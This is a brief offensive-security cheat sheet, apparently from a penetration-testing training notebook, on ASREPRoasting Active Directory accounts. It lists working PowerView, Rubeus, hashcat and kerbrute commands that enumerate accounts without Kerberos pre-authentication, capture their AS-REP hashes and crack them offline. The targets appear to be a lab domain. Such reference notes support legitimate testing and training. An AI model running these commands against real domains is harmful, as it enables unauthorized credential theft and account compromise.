ASREPRoasting

ASREPRoasting is an attack that exploits user accounts in Active Directory that have Kerberos pre-authentication disabled. This allows an attacker to retrieve encrypted Ticket Granting Ticket (TGT) data, which can then be cracked offline to obtain plaintext passwords.

1. Enumerate Users with Pre-Authentication Not Required

Command:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Description: PowerView tool used to search for the DONT_REQ_PREAUTH value across user accounts in a target Windows domain. Performed from a Windows-based host.

2. Perform ASREPRoasting Attack with Rubeus

Command:

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Description: Uses Rubeus to perform an ASREPRoasting attack and formats the output for Hashcat. Performed from a Windows-based host.

3. Crack Captured Hash with Hashcat

Command:

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Description: Uses Hashcat to attempt to crack the captured ASREP hash using a wordlist (rockyou.txt). Performed from a Linux-based host.

4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute

Command:

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Description: Enumerates users in a target Windows domain and automatically retrieves ASREP hashes for any users that do not require Kerberos pre-authentication. Performed from a Linux-based host.

PreviousLLMNR/NTB-NS Poisoning NextDCSync

Last updated 10 months ago

hashtag1. Enumerate Users with Pre-Authentication Not Required

hashtag2. Perform ASREPRoasting Attack with Rubeus

hashtag3. Crack Captured Hash with Hashcat

hashtag4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute

1. Enumerate Users with Pre-Authentication Not Required

2. Perform ASREPRoasting Attack with Rubeus

3. Crack Captured Hash with Hashcat

4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute